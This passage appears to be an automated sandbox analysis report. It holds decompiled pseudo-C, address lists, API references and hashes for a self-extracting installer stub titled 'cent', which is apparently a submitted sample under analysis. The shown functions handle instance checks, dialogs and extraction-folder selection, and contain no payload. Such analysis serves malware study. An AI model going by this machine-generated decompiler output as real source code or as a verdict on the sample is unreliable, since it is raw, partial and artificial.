                                                                                                                                                                                                      												if(( *0xe79a34 & 0x00000100) == 0 || ( *0xe78a38 & 0x00000001) != 0 || E00E718A3(_t64, _t66) != 0) {
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                      													if(E00E76517(_t57, 0x7d6, _t34, E00E719E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00E72390(0xe78a3a);
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								E00E744B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                      							if(E00E7468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                      								 *0xe78588 = _t43;
                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(( *0xe79a34 & 0x00000080) == 0) {
                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                      										if(E00E744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                      										E00E744B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										CloseHandle( *0xe78588);
                                                                                                                                                                                                      										 *0xe79124 = 0x800700b7;
                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                      						E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00e72cb5
                                                                                                                                                                                                      0x00e72cbc
                                                                                                                                                                                                      0x00e72cc7
                                                                                                                                                                                                      0x00e72cc9
                                                                                                                                                                                                      0x00e72cd1
                                                                                                                                                                                                      0x00e72cd3
                                                                                                                                                                                                      0x00e72cd9
                                                                                                                                                                                                      0x00e72ce9
                                                                                                                                                                                                      0x00e72cf9
                                                                                                                                                                                                      0x00e72d0e
                                                                                                                                                                                                      0x00e72d15
                                                                                                                                                                                                      0x00e72d1c
                                                                                                                                                                                                      0x00e72ef3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72d2d
                                                                                                                                                                                                      0x00e72d34
                                                                                                                                                                                                      0x00e72d3b
                                                                                                                                                                                                      0x00e72d40
                                                                                                                                                                                                      0x00e72d48
                                                                                                                                                                                                      0x00e72d59
                                                                                                                                                                                                      0x00e72d84
                                                                                                                                                                                                      0x00e72e1f
                                                                                                                                                                                                      0x00e72e1f
                                                                                                                                                                                                      0x00e72e2e
                                                                                                                                                                                                      0x00e72e41
                                                                                                                                                                                                      0x00e72e5a
                                                                                                                                                                                                      0x00e72e62
                                                                                                                                                                                                      0x00e72e6c
                                                                                                                                                                                                      0x00e72e6c
                                                                                                                                                                                                      0x00e72e75
                                                                                                                                                                                                      0x00e72e77
                                                                                                                                                                                                      0x00e72e77
                                                                                                                                                                                                      0x00e72e84
                                                                                                                                                                                                      0x00e72e8b
                                                                                                                                                                                                      0x00e72e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72e96
                                                                                                                                                                                                      0x00e72e96
                                                                                                                                                                                                      0x00e72e9e
                                                                                                                                                                                                      0x00e72ea2
                                                                                                                                                                                                      0x00e72eba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72ece
                                                                                                                                                                                                      0x00e72ede
                                                                                                                                                                                                      0x00e72eed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72eed
                                                                                                                                                                                                      0x00e72eef
                                                                                                                                                                                                      0x00e72eef
                                                                                                                                                                                                      0x00e72eef
                                                                                                                                                                                                      0x00e72eef
                                                                                                                                                                                                      0x00e72ea2
                                                                                                                                                                                                      0x00e72e86
                                                                                                                                                                                                      0x00e72e88
                                                                                                                                                                                                      0x00e72e88
                                                                                                                                                                                                      0x00e72e43
                                                                                                                                                                                                      0x00e72e48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72e48
                                                                                                                                                                                                      0x00e72e30
                                                                                                                                                                                                      0x00e72e30
                                                                                                                                                                                                      0x00e72ef8
                                                                                                                                                                                                      0x00e72f01
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72f01
                                                                                                                                                                                                      0x00e72d8a
                                                                                                                                                                                                      0x00e72d8f
                                                                                                                                                                                                      0x00e72da1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72da3
                                                                                                                                                                                                      0x00e72dae
                                                                                                                                                                                                      0x00e72db4
                                                                                                                                                                                                      0x00e72dbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72dca
                                                                                                                                                                                                      0x00e72dd3
                                                                                                                                                                                                      0x00e72df5
                                                                                                                                                                                                      0x00e72e02
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72dd5
                                                                                                                                                                                                      0x00e72dde
                                                                                                                                                                                                      0x00e72de3
                                                                                                                                                                                                      0x00e72e04
                                                                                                                                                                                                      0x00e72e0a
                                                                                                                                                                                                      0x00e72e10
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72e10
                                                                                                                                                                                                      0x00e72dd3
                                                                                                                                                                                                      0x00e72dbb
                                                                                                                                                                                                      0x00e72da1
                                                                                                                                                                                                      0x00e72d5b
                                                                                                                                                                                                      0x00e72d5b
                                                                                                                                                                                                      0x00e72d5d
                                                                                                                                                                                                      0x00e72d69
                                                                                                                                                                                                      0x00e72d6e
                                                                                                                                                                                                      0x00e72f06
                                                                                                                                                                                                      0x00e72f06
                                                                                                                                                                                                      0x00e72f06
                                                                                                                                                                                                      0x00e72d59
                                                                                                                                                                                                      0x00e72f18

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E72CD9
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E72CE9
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E72CF9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E72D34
                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00E72D40
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E72DAE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00E72DBD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E72E0A
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                      • API String ID: 1002816675-2654900392
                                                                                                                                                                                                      • Opcode ID: febabc729036d32f9b60530e628fc72c429285343764e74c8edf36e3814268b9
                                                                                                                                                                                                      • Instruction ID: 6bd1f275992b475f0a86355424822e4150105759fa66b940c0235897f45d7243
                                                                                                                                                                                                      • Opcode Fuzzy Hash: febabc729036d32f9b60530e628fc72c429285343764e74c8edf36e3814268b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C5103703403016EE765E7369D0AB7A3698EB91704F44E03DFB8DF51E2DBB48885D621
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                      			E00E734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *0xe791d8 = 1;
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                      					 *0xe78584 = _t35;
                                                                                                                                                                                                      					E00E743D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                      					__eflags =  *0xe78184; // 0x1
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E00E74FE0, 0, 0, 0xe78798);
                                                                                                                                                                                                      					 *0xe7879c = _t17;
                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						E00E744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					ResetEvent( *0xe7858c);
                                                                                                                                                                                                      					_t38 =  *0xe78584; // 0x0
                                                                                                                                                                                                      					_t25 = E00E744B9(_t38, 0x4b2, 0xe71140, 0, 0x20, 4);
                                                                                                                                                                                                      					__eflags = _t25 - 6;
                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						 *0xe791d8 = 1;
                                                                                                                                                                                                      						SetEvent( *0xe7858c);
                                                                                                                                                                                                      						_t39 =  *0xe7879c; // 0x0
                                                                                                                                                                                                      						E00E73680(_t39);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetEvent( *0xe7858c);
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                      					TerminateThread( *0xe7879c, 0);
                                                                                                                                                                                                      					EndDialog(_a4, _a12);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x00e734fb
                                                                                                                                                                                                      0x00e734fe
                                                                                                                                                                                                      0x00e73665
                                                                                                                                                                                                      0x00e73666
                                                                                                                                                                                                      0x00e73666
                                                                                                                                                                                                      0x00e73668
                                                                                                                                                                                                      0x00e7366e
                                                                                                                                                                                                      0x00e7366e
                                                                                                                                                                                                      0x00e73671
                                                                                                                                                                                                      0x00e73671
                                                                                                                                                                                                      0x00e73677
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73677
                                                                                                                                                                                                      0x00e73504
                                                                                                                                                                                                      0x00e73506
                                                                                                                                                                                                      0x00e73507
                                                                                                                                                                                                      0x00e7350c
                                                                                                                                                                                                      0x00e7365b
                                                                                                                                                                                                      0x00e7365f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73661
                                                                                                                                                                                                      0x00e73512
                                                                                                                                                                                                      0x00e73515
                                                                                                                                                                                                      0x00e735be
                                                                                                                                                                                                      0x00e735c1
                                                                                                                                                                                                      0x00e735d1
                                                                                                                                                                                                      0x00e735d8
                                                                                                                                                                                                      0x00e735de
                                                                                                                                                                                                      0x00e735f8
                                                                                                                                                                                                      0x00e73617
                                                                                                                                                                                                      0x00e73617
                                                                                                                                                                                                      0x00e73623
                                                                                                                                                                                                      0x00e73637
                                                                                                                                                                                                      0x00e7363d
                                                                                                                                                                                                      0x00e73642
                                                                                                                                                                                                      0x00e73644
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73646
                                                                                                                                                                                                      0x00e73652
                                                                                                                                                                                                      0x00e73657
                                                                                                                                                                                                      0x00e73658
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73658
                                                                                                                                                                                                      0x00e73644
                                                                                                                                                                                                      0x00e7351b
                                                                                                                                                                                                      0x00e7351d
                                                                                                                                                                                                      0x00e7354f
                                                                                                                                                                                                      0x00e73553
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7355f
                                                                                                                                                                                                      0x00e73565
                                                                                                                                                                                                      0x00e7357c
                                                                                                                                                                                                      0x00e73581
                                                                                                                                                                                                      0x00e73584
                                                                                                                                                                                                      0x00e7359b
                                                                                                                                                                                                      0x00e735a1
                                                                                                                                                                                                      0x00e735a7
                                                                                                                                                                                                      0x00e735ad
                                                                                                                                                                                                      0x00e735b3
                                                                                                                                                                                                      0x00e735b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e735b8
                                                                                                                                                                                                      0x00e73586
                                                                                                                                                                                                      0x00e73588
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73590
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73590
                                                                                                                                                                                                      0x00e73524
                                                                                                                                                                                                      0x00e73535
                                                                                                                                                                                                      0x00e73541
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73549
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000), ref: 00E73535
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00E73541
                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 00E7355F
                                                                                                                                                                                                      • SetEvent.KERNEL32(00E71140,00000000,00000020,00000004), ref: 00E73590
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E735C7
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00E735F1
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00E735F8
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00E73610
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00E73617
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00E73623
                                                                                                                                                                                                      • CreateThread.KERNEL32 ref: 00E73637
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00E73671
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 2406144884-3940384054
                                                                                                                                                                                                      • Opcode ID: d4b229c7bf89d59f86a47676d9dda28c58adf6b32c5e9fccda133565a9d87255
                                                                                                                                                                                                      • Instruction ID: f44e1d3db83e8aa56bd98e5eef20505a8acc3482e904d90651ad9f2fdbf375b6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4b229c7bf89d59f86a47676d9dda28c58adf6b32c5e9fccda133565a9d87255
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0831F1B0240300BFD760DF76EC0DE2B3B68E7C5B10F64A429F60EB52A1CB718984EA50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                      			E00E74224(char __ecx) {
                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					E00E744B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t76 =  *0xe788c0; // 0x0
                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					 *0xe787a0 = 0;
                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                      					_v40 = 0xe78598;
                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                      					_v32 = E00E74200;
                                                                                                                                                                                                      					_v28 = 0xe788c0;
                                                                                                                                                                                                      					 *0xe7a288( &_v52);
                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						 *0xe7a288(_t32, 0xe788c0);
                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *0xe788c0 != 0) {
                                                                                                                                                                                                      							E00E71680(0xe787a0, 0x104, 0xe788c0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe7a288(_v12);
                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t85 =  *0xe787a0; // 0x0
                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					GetTempPathA(0x104, 0xe788c0);
                                                                                                                                                                                                      					_t61 = 0xe788c0;
                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0xe788c1
                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0xe788c0; // 0x1cf1181
                                                                                                                                                                                                      					_t44 = CharPrevA(0xe788c0, _t5);
                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0xe788c0, _t44)) != 0x3a) {
                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x00e74234
                                                                                                                                                                                                      0x00e7423c
                                                                                                                                                                                                      0x00e74240
                                                                                                                                                                                                      0x00e743b2
                                                                                                                                                                                                      0x00e743b7
                                                                                                                                                                                                      0x00e743c0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e743c5
                                                                                                                                                                                                      0x00e7424c
                                                                                                                                                                                                      0x00e74252
                                                                                                                                                                                                      0x00e74257
                                                                                                                                                                                                      0x00e743a4
                                                                                                                                                                                                      0x00e743a5
                                                                                                                                                                                                      0x00e743ab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e743ab
                                                                                                                                                                                                      0x00e74263
                                                                                                                                                                                                      0x00e74269
                                                                                                                                                                                                      0x00e7426e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7427a
                                                                                                                                                                                                      0x00e74280
                                                                                                                                                                                                      0x00e74285
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7428d
                                                                                                                                                                                                      0x00e74293
                                                                                                                                                                                                      0x00e742e6
                                                                                                                                                                                                      0x00e742e9
                                                                                                                                                                                                      0x00e742ef
                                                                                                                                                                                                      0x00e742f4
                                                                                                                                                                                                      0x00e742f7
                                                                                                                                                                                                      0x00e74300
                                                                                                                                                                                                      0x00e74307
                                                                                                                                                                                                      0x00e7430e
                                                                                                                                                                                                      0x00e74315
                                                                                                                                                                                                      0x00e7431c
                                                                                                                                                                                                      0x00e74322
                                                                                                                                                                                                      0x00e74326
                                                                                                                                                                                                      0x00e7432d
                                                                                                                                                                                                      0x00e7432d
                                                                                                                                                                                                      0x00e7432f
                                                                                                                                                                                                      0x00e74334
                                                                                                                                                                                                      0x00e74343
                                                                                                                                                                                                      0x00e74349
                                                                                                                                                                                                      0x00e7434d
                                                                                                                                                                                                      0x00e74354
                                                                                                                                                                                                      0x00e74354
